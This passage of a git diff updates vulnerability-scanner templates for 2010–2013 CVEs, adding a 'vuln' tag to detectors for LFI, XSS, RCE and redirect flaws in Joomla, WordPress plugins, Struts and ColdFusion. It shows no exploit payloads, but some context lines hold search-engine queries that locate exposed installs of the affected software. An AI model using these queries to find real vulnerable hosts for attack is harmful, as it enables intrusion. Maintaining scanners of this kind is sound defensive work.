cve,cve2010,joomla,lfi,edb,danieljamesscott,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 38c13be300d..c9578125f62 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -35,7 +35,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi,vkev + tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index e2618af5408..050a8a63ac1 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: visocrea product: com_joomla_visites - tags: cve,cve2010,joomla,lfi,edb,visocrea + tags: cve,cve2010,joomla,lfi,edb,visocrea,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 5d602fe97fc..4a4c8178f18 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: foobla product: com_foobla_suggestions - tags: cve,cve2010,joomla,lfi,edb,foobla + tags: cve,cve2010,joomla,lfi,edb,foobla,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 48e569b0840..f2b98c7880f 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: xmlswf product: com_picsell - tags: cve,cve2010,edb,joomla,lfi,xmlswf + tags: cve,cve2010,edb,joomla,lfi,xmlswf,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 9f008dd96f3..480909114d4 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: 4you-studio product: com_jphone - tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio + tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index ed10ca17c54..b71e5f5567b 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: camtron product: cmnc-200_firmware - tags: cve,cve2010,iot,lfi,camera,edb,camtron + tags: cve,cve2010,iot,lfi,camera,edb,camtron,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 2ac53f0419e..fe8d3bfc9fa 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -29,7 +29,7 @@ info: product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" fofa-query: body="tiki wiki" - tags: cve,cve2010,tikiwiki,lfi,tiki + tags: cve,cve2010,tikiwiki,lfi,tiki,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index a2c01c45e9b..7126d0c3b10 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica + tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 589992d675e..7123f41c5dd 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: kanich product: com_jotloader - tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich + tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 623f78573d1..1fe34c74181 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: fxwebdesign product: com_jradio - tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign + tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 5c06a8d01aa..7a71c6dd4cf 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: janguo product: com_jimtawl - tags: cve,cve2010,joomla,lfi,edb,janguo + tags: cve,cve2010,joomla,lfi,edb,janguo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index b1b1dbb27ac..687b3125891 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: miniwork product: com_canteen - tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli + tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index a0f9bb8ba4c..bb56ee7205a 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: harmistechnology product: com_jejob - tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli + tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 58575f07c7c..79d0bbf141b 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -28,7 +28,7 @@ info: vendor: modx product: modx_revolution shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution" - tags: cve,cve2010,lfi,edb,packetstorm,modx + tags: cve,cve2010,lfi,edb,packetstorm,modx,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index c495cfe83a2..2eabad8c9fa 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joobi product: com_jstore - tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi + tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index bf331266e51..bcc7021206c 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mj2 product: majordomo_2 - tags: cve,cve2011,majordomo2,lfi,edb,mj2 + tags: cve,cve2011,majordomo2,lfi,edb,mj2,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-0518.yaml b/http/cves/2011/CVE-2011-0518.yaml index c083595d0e3..00b1bcb5944 100644 --- a/http/cves/2011/CVE-2011-0518.yaml +++ b/http/cves/2011/CVE-2011-0518.yaml @@ -19,7 +19,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2011,lotuscms,rce + tags: cve,cve2011,lotuscms,rce,vuln http: - method: POST diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 7c5670d2579..9a50d9ca147 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -27,7 +27,7 @@ info: vendor: mikoviny product: wp_custom_pages google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny + tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 1b1396d6316..c2903ddd2fe 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: chyrp product: chyrp - tags: cve,cve2011,lfi,chyrp,edb + tags: cve,cve2011,lfi,chyrp,edb,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index a97a232c336..5859e12a74c 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: chyrp product: chyrp - tags: cve,cve2011,lfi,chyrp + tags: cve,cve2011,lfi,chyrp,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index fffe8ce9490..41d9820b9be 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cisco product: unified_ip_interactive_voice_response - tags: cve,cve2011,lfi,cisco,edb,vkev + tags: cve,cve2011,lfi,cisco,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 6db72391c90..1d8f8bf4bd2 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -26,7 +26,7 @@ info: product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" fofa-query: body="tiki wiki" - tags: cve,cve2011,seclists,xss,tikiwiki,tiki + tags: cve,cve2011,seclists,xss,tikiwiki,tiki,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index c95a4254596..05828e220c5 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -27,7 +27,7 @@ info: vendor: simplerealtytheme product: advanced_text_widget_plugin google-query: inurl:"/wp-content/plugins/advanced-text-widget" - tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme + tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme,vuln http: - raw: diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 352dbcae12b..003f5224b83 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -28,7 +28,7 @@ info: product: "grand_flagallery" framework: wordpress google-query: "inurl:\"/wp-content/plugins/flash-album-gallery\"" - tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily + tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index b343da0d94a..528b78c5e92 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -27,7 +27,7 @@ info: fofa-query: - icon_hash=1090061843 - title="webtitan" - tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated + tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated,vuln http: - raw: diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index ac148e0d47b..c74e2c352d6 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: foobla product: com_obsuggest - tags: cve,cve2011,lfi,edb,joomla,foobla + tags: cve,cve2011,lfi,edb,joomla,foobla,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 93e69b482ab..fe2c480df1d 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -28,7 +28,7 @@ info: vendor: bueltge product: adminimize google-query: "inurl:\"/wp-content/plugins/adminimize/\"" - tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge,vkev + tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index ac72768b24f..c7d49a39573 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -28,7 +28,7 @@ info: vendor: fractalia product: flexible_custom_post_type google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" - tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia + tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 80f7b857ef2..378dee8d9bd 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -27,7 +27,7 @@ info: vendor: wordpress product: "alert_before_you_post" google-query: "inurl:\"/wp-content/plugins/alert-before-your-post\"" - tags: cve,cve2011,wordpress,xss,wp-plugin + tags: cve,cve2011,wordpress,xss,wp-plugin,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 9bbe0d0da4a..1a7a85b9344 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -26,7 +26,7 @@ info: vendor: skysa product: "skysa_app_bar_integration_plugin" google-query: "inurl:\"/wp-content/plugins/skysa-official/\"" - tags: cve,cve2011,wordpress,xss,wp-plugin,skysa + tags: cve,cve2011,wordpress,xss,wp-plugin,skysa,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 2c937adba5f..1f79720ddf8 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -28,7 +28,7 @@ info: vendor: clickdesk product: "clickdesk_live_support-live_chat_plugin" google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"" - tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk + tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 97a79103d1b..d3de377ac3c 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: orchardproject product: orchard - tags: cve,cve2011,redirect,orchard,orchardproject + tags: cve,cve2011,redirect,orchard,orchardproject,vuln http: - method: GET diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index f7b6d930c6b..7da8bea7078 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -27,7 +27,7 @@ info: vendor: "featurific_for_wordpress_project" product: "featurific-for-wordpress" google-query: "inurl:\"/wp-content/plugins/featurific-for-wordpress\"" - tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project + tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 61a175ac47f..6e22e6f7e14 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2012,apache,rce,struts,java,edb + tags: cve,cve2012,apache,rce,struts,java,edb,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 16bea536bcf..47b4cb1ae04 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -39,7 +39,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2012,ognl,injection,edb,apache,struts + tags: cve,cve2012,ognl,injection,edb,apache,struts,vuln variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 71dd046a3d6..797c5c29c90 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -28,7 +28,7 @@ info: vendor: count_per_day_project product: count_per_day google-query: inurl:"/wp-content/plugins/count-per-day" - tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project + tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index e7edfbdc650..58837eac156 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -28,7 +28,7 @@ info: vendor: attenzione product: yousaytoo google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"" - tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione + tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 72fe6c587ee..b2d5aa1f3f9 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: kybernetika product: phpshowtime - tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika + tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index faf0d985cee..749ad780f05 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -37,7 +37,7 @@ info: - title="openemr" - app="openemr" google-query: intitle:"openemr" - tags: cve,cve2012,lfi,openemr,traversal,edb + tags: cve,cve2012,lfi,openemr,traversal,edb,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index cf173539d1f..862df9926c3 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: 11in1 product: 11in1 - tags: cve,cve2012,lfi,edb,11in1 + tags: cve,cve2012,lfi,edb,11in1,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 9530abaf7f6..0d4d582cfee 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -28,7 +28,7 @@ info: product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 fofa-query: icon_hash=440258421 - tags: cve,cve2012,lfi,dolibarr,traversal,edb + tags: cve,cve2012,lfi,dolibarr,traversal,edb,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 4f805194cb3..4da5189d295 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -29,7 +29,7 @@ info: vendor: php product: php shodan-query: cpe:"cpe:2.3:a:php:php" - tags: cve,cve2012,kev,vulhub,rce,php,vkev + tags: cve,cve2012,kev,vulhub,rce,php,vkev,vuln variables: string: "CVE-2012-1823" diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 842c1a1c4b3..6a605fd3102 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -26,7 +26,7 @@ info: vendor: timely product: "all-in-one_event_calendar" google-query: "inurl:\"/wp-content/plugins/all-in-one-event-calendar\"" - tags: cve,cve2012,wordpress,xss,wp-plugin,timely + tags: cve,cve2012,wordpress,xss,wp-plugin,timely,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index aeae6ca9010..d5c88a5b04b 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: "mnt-tech" product: "wp-facethumb" - tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech + tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 6f6c46f4fcb..da59618a137 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -37,7 +37,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve,cve2012,oracle,rce,edb,vkev + tags: cve,cve2012,oracle,rce,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 45126d6eefc..c46c75eb12f 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -33,7 +33,7 @@ info: - http.title:"websitepanel" html:"login" fofa-query: title="websitepanel" html:"login" google-query: intitle:"websitepanel" html:"login" - tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated + tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated,vuln http: - raw: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index d407809f1be..addac8d4cf6 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: "mf_gig_calendar_project" product: "mf_gig_calendar" - tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project + tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index d991490c6b8..65c15f8a485 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 57bd9283e02..e88e55d85f9 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -28,7 +28,7 @@ info: vendor: ppfeufer product: "2-click-social-media-buttons" google-query: "inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"" - tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer + tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index d32bdb4e098..2c54303ba8f 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -26,7 +26,7 @@ info: vendor: laurent_destailleur product: awstats shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" - tags: cve2012,cve,xss,awstats,edb,laurent_destailleur + tags: cve2012,cve,xss,awstats,edb,laurent_destailleur,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 6e92ce0c9a2..fad4b21918a 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: "http.html:\"/wp-content/plugins/download-monitor/\"" fofa-query: "body=\"/wp-content/plugins/download-monitor/\"" - tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley + tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 1771e3d936d..48f226fad5d 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: flatnux product: flatnux - tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss + tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 7aafbb187ef..6910fbd0575 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: manageengine product: firewall_analyzer - tags: cve,cve2012,xss,manageengine,packetstorm + tags: cve,cve2012,xss,manageengine,packetstorm,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 654d4078115..71fae427ce1 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: gecad product: axigen_free_mail_server - tags: cve,cve2012,edb,axigen,lfi,mail,gecad,vkev + tags: cve,cve2012,edb,axigen,lfi,mail,gecad,vkev,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 369fee22f13..3b01b97a558 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: forescout product: counteract - tags: cve,cve2012,redirect,forescout,counteract + tags: cve,cve2012,redirect,forescout,counteract,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index dfd88804e94..9116aada99e 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -29,7 +29,7 @@ info: product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" fofa-query: body="tiki wiki" - tags: cve,cve2012,redirect,tikiwiki,groupware,tiki + tags: cve,cve2012,redirect,tikiwiki,groupware,tiki,vuln http: - method: GET diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 3f1dc84da7c..51c1ba77d95 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: "wordpress_integrator_project" product: "wordpress_integrator" - tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project + tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index c8a62a95378..95d339af731 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: age_verification_project product: age_verification - tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project + tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project,vuln http: - raw: diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 0c5f90e6708..f8d9dc0e486 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2013,cve,apache,rce,struts,ognl + tags: cve2013,cve,apache,rce,struts,ognl,vuln http: - method: POST diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 69ad118f34f..2eafb1185f9 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ 